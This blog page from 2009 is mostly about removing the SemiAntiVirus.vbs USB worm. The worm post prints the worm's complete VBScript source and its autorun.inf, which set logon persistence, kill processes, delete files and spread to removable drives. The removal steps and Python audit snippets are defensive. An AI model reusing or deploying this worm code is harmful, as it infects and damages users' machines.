Showing posts with label Security. Show all posts

Saturday, January 24, 2009

Clean your system after SemiAntivirus.vbs attack

To get the most out of this post, read the following blog posts first. If you feel you do not understand what the commenters have said, don't worry; I have taken the gist of the comments to write this.

Find out how SemiAntiVirus.vbs has come into your machine and how to delete it

Errors that can be possibly shown after you (or Anti Virus Software) delete SemiAntiVirus.vbs

Read the script of SemiAntiVirus.vbs

Here in this post, I will tell you how to fix those errors.

Fixing the Windows Script Host error which puts up a pop-up window at start-up saying "cannot find script file c:\windows\system32\semiantivirus.vbs"

Reasons

This happens because the virus is coded to launch together with userinit.exe, which runs the start-up sequence when the machine starts.

When the computer boots, userinit.exe is executed and then looks for semiantivirus.vbs to execute. But we (or the anti-virus software) deleted semiantivirus.vbs in the previous step.

Since the computer cannot find the semiantivirus.vbs file, it displays the pop-up window above.

So, first, you have to break the link between userinit.exe and semiantivirus.vbs.

Fix

1. Open Registry Editor (Start --> Run --> regedit --> OK)

2. Go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion and select \Winlogon

3. In the right-hand pane you will see a long list of entries. Right-click on Userinit and select Modify

4. In the Value Data text box you will see something like C:\WINDOWS\system32\userinit.exe,c:\windows\system32\semiantivirus.vbs

5. Change the value to C:\WINDOWS\system32\userinit.exe and click OK (the Userinit registry entry should then look like this; look at the status bar for navigation details)

6. Close the Registry Editor and restart the computer


--OR--

If you prefer to do it at the command prompt, this is the command (type %SYSTEMROOT% with single percent signs; doubled percent signs are only for batch files and would write the literal text into the value, which is a REG_SZ that Windows does not expand):
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %SYSTEMROOT%\System32\userinit.exe, /f

Fixing the Internet Explorer

Reasons
It looks like this because the virus has edited the registry entries for the title bar and the home page.

Fix for the Title Bar
1. Open Registry Editor (Start --> Run --> regedit --> OK)

2. Go to HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer and select Main

3. In the right-hand pane you will see a long list of entries. Right-click on Window Title and select Modify

4. Under Value Data you will see LRI Internet Explorer. Change that to Internet Explorer and click OK

--OR--

If you would like to do it at the command prompt, this is the command: reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /d "" /f


Fix for the Home Page
1. Repeat steps 1 and 2 of the fix for the title bar

2. In the right-hand pane, right-click on Start Page and select Modify

3. Fill in the Value Data box with the URL of the page you wish to have as your home page (for example, www.google.lk) and click OK

--OR--

If you would like to do it at the command prompt, this is the command: reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.google.lk/" /f

--OR--

Or simply do it in the settings of Internet Explorer:
1. Go to Tools --> Internet Options --> General --> Home Page

After completing the above steps, the registry entry for Internet Explorer should look like this (look at the status bar for navigation details). The changes will be visible after you restart Internet Explorer.

Completing the above steps should remove the after-effects of the semiantivirus.vbs attack on your computer.
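The two registry fixes above are easy to get wrong by hand, so here is an added example (not code from the original post) that audits the values the worm rewrites and prints the same reg add commands. It works on value strings so it runs anywhere; on Windows the optional read_live_values() reads the real values through the winreg module. The system directory and home page are assumptions passed in as parameters, and the infected Userinit value is constructed from what the script's RegWrite call composes.

```python
"""Audit the registry values SemiAntiVirus.vbs tampers with and build the fix.

Added example, not code from the original post. Works on value strings; on
Windows read_live_values() fetches the real ones with winreg.
"""
import sys

# Constructed sample: the Userinit value exactly as the script's RegWrite call
# composes it (userinit.exe, then wscript.exe running the worm from system32).
INFECTED_USERINIT = (r"C:\WINDOWS\system32\userinit.exe,"
                     r"C:\WINDOWS\system32\wscript.exe C:\WINDOWS\system32\SemiAntiVirus.vbs")
CLEAN_USERINIT = r"C:\WINDOWS\system32\userinit.exe,"


def split_userinit(value):
    """Winlogon runs each comma-separated entry of Userinit in turn."""
    return [entry.strip() for entry in value.split(",") if entry.strip()]


def audit_userinit(value, system_dir=r"C:\WINDOWS\system32"):
    """Return (extra_entries, corrected_value).

    Anything other than <system_dir>\\userinit.exe is flagged: that single
    entry (with the trailing comma Windows ships by default) is the whole
    expected value on a stand-alone XP machine.
    """
    expected = (system_dir + r"\userinit.exe").lower()
    extras = [e for e in split_userinit(value) if e.lower() != expected]
    return extras, system_dir + r"\userinit.exe,"


def audit_ie_main(window_title, start_page):
    """Describe the two Internet Explorer\\Main values the worm rewrites.

    A non-empty Window Title is unusual on a home PC (IE shows no suffix by
    default); Start Page is a user choice, so it is reported, not judged.
    """
    findings = []
    if window_title:
        findings.append("Window Title is set to %r (default is unset)" % window_title)
    findings.append("Start Page is %r; confirm this is what you chose" % start_page)
    return findings


def fix_commands(system_dir, home_page):
    """The reg add commands from the post, with the value strings built here."""
    return [
        'reg add "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" '
        '/v Userinit /d "%s\\userinit.exe," /f' % system_dir,
        'reg add "HKCU\\Software\\Microsoft\\Internet Explorer\\Main" /v "Window Title" /d "" /f',
        'reg add "HKCU\\Software\\Microsoft\\Internet Explorer\\Main" /v "Start Page" /d "%s" /f' % home_page,
    ]


def read_live_values():
    """Windows only: read the three values with winreg (returns None elsewhere)."""
    if sys.platform != "win32":
        return None
    import winreg
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon") as k:
        userinit = winreg.QueryValueEx(k, "Userinit")[0]
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                        r"Software\Microsoft\Internet Explorer\Main") as k:
        try:
            title = winreg.QueryValueEx(k, "Window Title")[0]
        except FileNotFoundError:      # value absent means IE uses its default title
            title = ""
        start = winreg.QueryValueEx(k, "Start Page")[0]
    return userinit, title, start


if __name__ == "__main__":
    live = read_live_values()
    # Off Windows, fall back to the constructed infected values for a dry run.
    userinit, title, start = live or (INFECTED_USERINIT, "LRI Internet Explorer", "about:blank")
    extras, fixed = audit_userinit(userinit)
    for e in extras:
        print("Userinit runs an extra program:", e)
    for f in audit_ie_main(title, start):
        print(f)
    if extras or title:
        print("Fix:")
        for cmd in fix_commands(r"C:\WINDOWS\system32", "http://www.google.lk/"):
            print("  " + cmd)
```

Running it off Windows prints the audit of the constructed infected values and the three fix commands; on an XP machine it audits the live registry instead. The Userinit comparison is case-insensitive because the registry value is not case-sensitive, and the corrected value keeps the trailing comma that Windows writes by default.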

And thank you Shaakunthala, Sadeepa, Isuru and Abish for your valuable comments in earlier posts!!


Friday, January 23, 2009

After effects of removing the SemiAntiVirus.vbs my way

I still have not encountered any problems except this error message at start-up. The missing file is the virus file, which I deleted this way. I do not understand how to fix this. Please help.

And Internet Explorer looks like this. The title has been changed to LRI Internet Explorer and the home page to about:blank. Keep in touch; answers to all these problems will be on the blog soon. PS: I found out how to fix these two errors. If you are interested, click here.

Removing the SemiAntiVirus.vbs file from an infected computer or a USB Drive

I found my own way to remove the SemiAntiVirus.vbs virus I mentioned in the last post. My computer runs Windows XP (Service Pack 3), and therefore I do not think this will work on any other platform.

Symptoms (as I experienced them; if you have more, please add them in the comments section)
1. When I click on the Shut Down button, it logs off and restarts several times. I had to wait until it came to the welcome screen, and click Shut Down again to make it really "shut down".
2. The title bar of Internet Explorer was changed to "LRI Internet Explorer" (and the home page was changed to about:blank).
3. I could not stop a USB drive in order to remove it safely. It says that another programme is using the USB drive, but I was sure that no data transfer between the computer and the USB drive was happening at that time.
4. My folder settings were changed automatically to not show hidden files and folders.

How to prevent
This spreads through USB drives. This is how the AutoRun window and the files on an affected USB drive look. If you get a window like this, click "Take no action" and OK. (Pavi, sorry I had to tell everybody that I got it from your pen drive.)
The best way to prevent it is to use the Folders panel of Windows Explorer. As I have done above, open My Computer, click on Folders and select the USB drive you want to open from the Folders panel. Note that the AutoRun window says that there is a program on the USB drive; in reality, it is the virus. Now simply select the autorun.inf file and SemiAntiVirus.vbs and press Shift+Delete. That removes the virus from the USB drive. But if your machine is already infected, you have to remove it from there too.

NOTE: If you are really interested in knowing about viruses and how they work, right-click on the file and select Open With --> Notepad. You will then see text like this, which explains how the virus really infects your system.

Removing the virus from the computer

It is a simple process. If you have Process Explorer, open it and look for wscript.exe (in my case it is wscript.exe because the programme creates an object called WScript.Shell).

If you don't have it, download and install it from the link above. It is really worth having on your computer.

Right-click on the process and select Properties. In the Properties window you can find where the virus is actually saved by looking at the Path. In my case it is c:\windows\system32\semiantivirus.vbs


But if you look at the command line, you can see that the process is executing semiantivirus.vbs, which is, in other words, the virus file.

(That is why we cannot stop a USB drive and why the title bar of IE says LRI Internet Explorer. If you look at the code, you will understand it better.)

First kill the wscript.exe process and then go to c:\windows\system32\

Find the semiantivirus.vbs file and delete it permanently (select the file and press Shift+Delete)

There you go!!
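The Process Explorer walk-through above (find the script host, read its command line, kill it, then delete the script) can be written down as a small triage routine. This is an added example, not the post's own procedure or any Sysinternals code: it takes (pid, image name, command line) triples as Process Explorer would show them, picks out wscript.exe/cscript.exe processes running a script from the system directory, and returns the removal order the post describes. The process list and the system directory are constructed assumptions.

```python
"""Triage script-host processes the way the post does with Process Explorer.

Added example, not from the original post. Input is a list of
(pid, image name, command line) triples; output is the ordered removal plan:
stop the host first, then delete the script it was running.
"""
import re

# Script hosts whose command line names the script they execute.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Constructed sample: two ordinary processes and the worm's host process,
# with the command line the autorun/Userinit entries on this page produce.
SAMPLE_PROCESSES = [
    (1432, "explorer.exe", r"C:\WINDOWS\Explorer.EXE"),
    (1880, "wscript.exe",
     r"C:\WINDOWS\system32\wscript.exe C:\WINDOWS\system32\SemiAntiVirus.vbs"),
    (2044, "notepad.exe", r"notepad.exe C:\Documents and Settings\me\notes.txt"),
]

# A quoted path (may contain spaces) or a bare token ending in a WSH extension.
_SCRIPT_ARG = re.compile(
    r'"([^"]+\.(?:vbs|vbe|js|jse|wsf))"|(\S+\.(?:vbs|vbe|js|jse|wsf))', re.I)


def script_from_cmdline(cmdline):
    """Return the script path a wscript/cscript command line runs, or None."""
    m = _SCRIPT_ARG.search(cmdline)
    if not m:
        return None
    return m.group(1) or m.group(2)


def suspicious_script_hosts(processes, system_dir=r"C:\WINDOWS\system32"):
    """(pid, script path) for script hosts running a script out of system_dir.

    A .vbs sitting next to the system binaries and launched at logon is the
    pattern the post found; scripts elsewhere are left for manual review.
    """
    hits = []
    for pid, name, cmdline in processes:
        if name.lower() not in SCRIPT_HOSTS:
            continue
        script = script_from_cmdline(cmdline)
        if script and script.lower().startswith(system_dir.lower() + "\\"):
            hits.append((pid, script))
    return hits


def removal_plan(processes):
    """Ordered steps: terminate the host, then delete the script it ran.

    The order matters: while the host holds the file open, Windows reports
    the script as "being used by another program" and refuses the delete.
    """
    steps = []
    for pid, script in suspicious_script_hosts(processes):
        steps.append(("kill process", pid))
        steps.append(("delete file", script))
    return steps


if __name__ == "__main__":
    for action, target in removal_plan(SAMPLE_PROCESSES):
        print("%-13s %s" % (action, target))
```

On the constructed list it yields "kill process 1880" followed by "delete file C:\WINDOWS\system32\SemiAntiVirus.vbs", which is exactly the two manual steps above. A script host running something from a user's own folder is deliberately not flagged, since that is what legitimate logon scripts look like.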

Another interesting thing.

Here I found that WScript.exe is the version of Windows Script Host that lets you run scripts from Windows.

However, I'm pretty sure that I deleted the virus file, which was disguised under the name of the original Windows WScript file.



So after all, everything is simple.. have fun.. love you, virus!!

PS: If you know any other ways, or if you think my way is wrong, please do not hesitate to comment. I love learning.

PS2: Removing the virus file is not enough to get rid of it. After removing the file, please continue reading this post to clean up the after-effects of the virus attack.

Thursday, January 22, 2009

Dear SemiAntiVirus.vbs, you are gladly welcome to my machine !

Mm, well, I'm proud to announce that I do not use an anti-virus guard or a virus removal tool or anything of that kind. On my computer it is all about manual virus removal, or rather prevention.

But yesterday I came across this damn thing, which does awful things like changing the folder settings. I had set the folder settings to show hidden files, but within a few seconds it was changed to do not show hidden files and folders.

Soooo, after all, my computer too was infected. It was a quick virus/worm, I say. I was trying to format a USB drive and suddenly it was there!!

Here is the script, if anyone is interested.


This is the autorun file:

[autorun]
open=wscript.exe SemiAntiVirus.vbs
icon=%systemroot%\System32\SHELL32.dll,8
action=Open folder to view files
shell\open=Open
shell\open\Command=wscript.exe SemiAntiVirus.vbs
shell\Auto=AutoPlay
shell\Auto\Command=wscript.exe SemiAntiVirus.vbs
shell\Explore\Command=wscript.exe SemiAntiVirus.vbs
shell\Find=Search...
shell\Find\Command=wscript.exe SemiAntiVirus.vbs
shell\Format...=Format...
shell\Format...\Command=wscript.exe SemiAntiVirus.vbs

Note: you can no longer assume that formatting an affected USB drive is a safe way to get rid of viruses. For example, this virus gets into the computer by 5 methods, as the code above suggests:

1. Opening
2. Using the AutoPlay feature
3. Exploring (right-click and select Explore)
4. Searching for files saved on the USB drive
5. Formatting

Interesting!!
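To see why formatting and searching both run the script, it helps to read autorun.inf the way Explorer does: open= (or shellexecute=) is the default action, and every shell\<verb>\command= entry hooks one context-menu verb. Here is an added example (not code from the original post) that parses an autorun.inf, lists every entry that can execute something, and reports the distinct user actions that would launch a script interpreter; it serves both the five-methods list above and the "how to prevent" section of the removal post. The sample file is the one reproduced on this page, embedded as a constructed string; a benign autorun.inf that only sets an icon and a label is included for contrast.

```python
"""Parse an autorun.inf and list every Explorer action that would run something.

Added example, not code from the original post. Keys are matched
case-insensitively, only the [autorun] section is read, and the verbs come
from shell\\<verb>\\command entries plus the top-level open=/shellexecute=.
"""
import re

# Constructed sample: the autorun.inf shown in the post, CRLF line endings.
SAMPLE_AUTORUN = "\r\n".join([
    "[autorun]",
    "open=wscript.exe SemiAntiVirus.vbs",
    r"icon=%systemroot%\System32\SHELL32.dll,8",
    "action=Open folder to view files",
    r"shell\open=Open",
    r"shell\open\Command=wscript.exe SemiAntiVirus.vbs",
    r"shell\Auto=AutoPlay",
    r"shell\Auto\Command=wscript.exe SemiAntiVirus.vbs",
    r"shell\Explore\Command=wscript.exe SemiAntiVirus.vbs",
    r"shell\Find=Search...",
    r"shell\Find\Command=wscript.exe SemiAntiVirus.vbs",
    r"shell\Format...=Format...",
    r"shell\Format...\Command=wscript.exe SemiAntiVirus.vbs",
])

# Constructed sample: a harmless autorun.inf that only customises the drive.
BENIGN_AUTORUN = "[autorun]\r\nicon=setup.exe,0\r\nlabel=My USB\r\n"

# Interpreters whose presence as the command means a script runs.
SCRIPT_INTERPRETERS = {"wscript", "cscript", "mshta", "cmd", "powershell"}

_VERB_COMMAND = re.compile(r"shell\\(.+)\\command")


def parse_autorun(text):
    """Return {lower-cased key: value} for the [autorun] section only."""
    entries = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                                    # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def launch_vectors(text):
    """(trigger, command) for every entry that can execute something."""
    entries = parse_autorun(text)
    vectors = []
    for key in ("open", "shellexecute"):              # default action
        if key in entries:
            vectors.append((key, entries[key]))
    for key, value in entries.items():                 # context-menu verbs
        m = _VERB_COMMAND.fullmatch(key)
        if m:
            vectors.append(("shell\\%s\\command" % m.group(1), value))
    return vectors


def explorer_actions(text):
    """Distinct user actions that fire a command; open= counts as the 'open' verb."""
    actions = set()
    for trigger, _ in launch_vectors(text):
        if trigger in ("open", "shellexecute"):
            actions.add("open")
        else:
            actions.add(trigger.split("\\")[1])
    return actions


def script_host_triggers(text):
    """Triggers whose command invokes a script interpreter (the worm's pattern)."""
    hits = []
    for trigger, command in launch_vectors(text):
        parts = command.split()
        if not parts:
            continue
        exe = parts[0].rsplit("\\", 1)[-1].lower()     # strip any directory
        if exe.endswith(".exe"):
            exe = exe[:-4]
        if exe in SCRIPT_INTERPRETERS:
            hits.append(trigger)
    return hits


if __name__ == "__main__":
    for trigger, command in launch_vectors(SAMPLE_AUTORUN):
        print("%-28s -> %s" % (trigger, command))
    print("actions that run a script:", sorted(explorer_actions(SAMPLE_AUTORUN)))
    print("benign file launches:", launch_vectors(BENIGN_AUTORUN))
```

On the post's autorun.inf this reports six launching entries and five distinct actions (open, auto, explore, find, format...), which is the list above; the benign file yields none. Keys are lower-cased before matching because Windows treats INI keys case-insensitively, so shell\Format...\Command and shell\format...\command are the same entry.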

The actual virus script, which can be found in c:\windows\system32\semiantivirus.vbs

To tell the truth, I do not understand a single line of this code (except the italicized part, which has a good sense of humour), but I hope it will help the computer geeks in finding a solution.

Important: please do not use this information for unethical purposes

'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them and its specially for LRI School only.
'I am not responsible if it goes to other place.
'If you do not belong to LRI Family then, please .......
'Author : Rajkumar Ghale (edited of VirusRemoval.vbs) of Sujin
'About me: I got a lots of program.
' If u want them, then u can contact me.

'Original Copy : Boot.vbs
'Virus Name : isetup.exe or Kinja.exe

'Another Copy : Sys.vbs
'Other Copy by Sujin : VirusRemoval.vbs
'******************************************************************
'******************************************************************

Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,folder,Files,Delete,auto,root,rtn,appfolder,kinzadir
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
appfolder=Shells.SpecialFolders("AppData")
kinzadir = appfolder & "\dxdlls"
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop

crvbs SystemDir,"SemiAntiVirus.vbs"

Shells.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"

Count=Drv.DriveType

Do

delt SystemDir,"scvvhsot.exe",true
delt WinDir,"scvvhsot.exe",true
delt SystemDir,"blastclnnn.exe",true
delt SystemDir,"dxdlg.exe",true
delt SystemDir,"wprop.exe",true
delt SystemDir,"boot.vbs",false
delt SystemDir,"imapd.exe",true
delt SystemDir,"imapdb.exe",true
delt SystemDir,"imapdc.dll",false
delt SystemDir,"imapdd.dll",false
delt SystemDir,"imapde.dll",false
delt SystemDir,"kinza.exe",true
delt SystemDir,"isetup.exe",true
delt SystemDir,"Drivers\etc\hints.exe",true
For each Files in kinzadir.Files
set WriteAll = Fso.GetFile(Files.Name)
set Delete = WriteAll.Delete(True)
Next
set WriteAll = Fso.GetFoler(kinzadir)
set Delete = WriteAll.Delete(True)
Shells.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","LRI Internet Explorer"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\SemiAntiVirus.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
Set Delete = Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true)
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

delt Drives.Path, "ravmon.exe",false
if Drives.DriveType = 1 then
crvbs Drives.Path,"SemiAntiVirus.vbs"
End if
delt Drives.Path,"sxs.exe",false
delt Drives.Path,"kinza.exe",false
delt Drives.Path,"SCVVHSOT.exe",false
delt Drives.Path,"New Folder.exe",false
delt Drives.Path,"Autorun.inf",false
delt Drives.Path,"isetup.exe",false
delt Drives.Path,"explorer.exe",false
delt Drives.Path,"smss.exe",false
delt Drives.Path,"winfile.exe",false
delt Drives.Path,"run.wsh",false

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
crinf Drives.Path,"autorun.inf"
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 2000
end if


loop while Count<>1


sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
Set File = oFileSys.GetFile(WScript.ScriptFullName)

For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCse(Cut)=UCase(file2find) Then
If oFile.Name <> "SemiAntiVirus.vbs" Then set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub

sub delt(fPath, fName, kil)
dim fSys, Delet, Wri, raj
set raj = CreateObject("Wscript.Shell")
set fSys = CreateObject("Scripting.FileSystemObject")
if fSys.FileExists(fPath & "\" & fName) then
if kil = true then
raj.Run "taskkill /f /im " & fName,0
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
else
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
End if
End if
end sub

sub crvbs(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
set mfile = fSys.GetFile(WScript.ScriptFullName)
Set ReadAl = mfile.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
AllFil = AllFil & ReadAl.readline
AllFil = AllFil & vbcrlf
Loop
If fSys.FileExists(fPath & "\" & fName) then
set Writ = fSys.GetFile(fPath & "\" & fName)
dt = Writ.DateLastModified
dt1 = mfile.DateLastModified
if (datevalue(dt1)-datevalue(dt)) > 0 then
delt fPath,"SemiAntiVirus.vbs",false
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fname)
Writ.Attributes = -1
end if
else
set Writ = fSys.CreateTextFile(fPath & "\SemiAntiVirus.vbs",true,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
end sub

sub crinf(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
eLine =eLine & "[autorun]" & vbcrlf
eLine =eLine & "open=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "icon=%systemroot%\System32\SHELL32.dll,8" & vbcrlf
eLine =eLine & "action=Open folder to view files" & vbcrlf
eLine =eLine & "shell\open=Open" & vbcrlf
eLine =eLine & "shell\open\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Auto=AutoPlay" & vbcrlf
eLine =eLine & "shell\Auto\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Explore\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Find=Search..." & vbcrlf
eLine =eLine & "shell\Find\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Format...=Format..." & vbcrlf
eLine =eLine & "shell\Format...\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
If fSys.FileExists(fPath & "\" & fName) then
set Chg = fSys.GetFile(fPath & "\" & fName)
set ReadAl = Chg.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
aLine = aLine & ReadAl.readline
aLine = aLine & vbcrlf
Loop
ReadAl.close
If trim(aLine) <> trim(eLine) then
Set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.write eLine
Writ.close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
End if
else
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.Write eLine
Writ.Close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if

End sub




I am still trying to find a way to remove this. The .vbs file cannot be deleted, as it says that it is being used by another program.

Mm, and the best part is that it does not allow another anti-virus guard to be installed on the machine. I tried to install Avast, but the moment setup.exe loads, the machine restarts.

Coool, keep in touch; I'll post how to remove it if I find a way.

Until then, have fun!!

PS: If you know any way to remove this, you are more than welcome to share it.



Thursday, January 15, 2009

Analyze the anatomy of your enemy's web site


This is about a site which can analyze any website you want. Just enter the website you want to analyze and hit Enter. If you entered my blog address, you might end up with something like this.

I think the tool is quite useful for people who are interested in web design.

On the other hand, if people start to use the site's technology for unethical purposes, it would be a curse for the whole world too!!

If you are interested, click here to visit the site.


Friday, January 9, 2009

Google search finds missing child

I thought it worthwhile to share this. This time it was used for a good purpose, but who knows what will happen when this Google tracking technology goes into the hands of terrorists and so forth?

A nine-year-old girl, allegedly kidnapped by her grandmother, has been found using a mobile phone signal and Google Street View.

A police officer and a firefighter in Athol, Massachusetts, joined forces after authorities were alerted that Natalie Maltais had been taken.

Officers used GPS in the girl's mobile phone to find her approximate location.

They fed the co-ordinates into Google Street View, pinpointing a hotel where the child was subsequently found.

The alarm was raised after grandmother Rose Maltais picked up Natalie from the child's legal guardians for what was supposed to be a weekend away.

She "said that she wasn't going to return Natalie and then left the state", Athol police chief Timothy Anderson told the BBC.

The police contacted Ms Maltais, but after she didn't return Natalie as promised, they decided to track them down using Natalie's mobile phone.

Since 2005, US law says that mobile phone providers must be able to locate 67% of callers within 100 metres and 95% of callers within 300 meters.

This requirement has led to GPS capability in most new mobile phones in the US.

"This is very useful, although we can only use it in emergency situations such as when a person is missing or lost, or a life is in danger," said chief Anderson.

Knowing this, police officer Todd Neale contacted the mobile phone provider, AT&T, which gave him GPS coordinates every time the phone was activated. Police must submit a compliance form to the phone provider to request location information.

Source: BBC

Thursday, January 8, 2009

What Tamilnet says about the Sirasa attack and the Lasantha Wick assassination

Sri Lanka: RSF condemns attack on Tamil-owned TV station


Reporters sans frontières (RSF), a Paris-based media watchdog, in a press release issued today, condemned the attack on Maharajah Television Network (MTV) near Colombo by heavily armed men early Tuesday morning. "Violence and threats against such privately-owned media outlets and journalists trying to impartially report on the conflict must stop," the RSF release said, adding, "[t]he network is one of the country's few, and very popular, independent news sources." Several Sri Lanka Government ministers and Government-owned media have previously charged the network with not being "patriotic" enough in reporting the war between the Sri Lankan military and the Liberation Tigers.


Sri Lanka: RSF: Mahinda Rajapakse "directly to blame" for Wickrematunge murder

Expressing outrage over the murder of Sunday Leader editor Lasantha Wickrematunge, Reporters sans frontières (RSF), a Paris-based media watchdog, in a press release issued today, said: "President Mahinda Rajapaksa, his associates and the government media are directly to blame because they incited hatred against him and allowed an outrageous level of impunity to develop as regards violence against the press. Sri Lanka's image is badly sullied by this murder, which is an absolute scandal and must not go unpunished."

It seems that the LTTE is making the best of the situation in the country. Just imagine the picture they create for the world with these headlines.

I took these from the Tamilnet RSS feed, as the site is not working.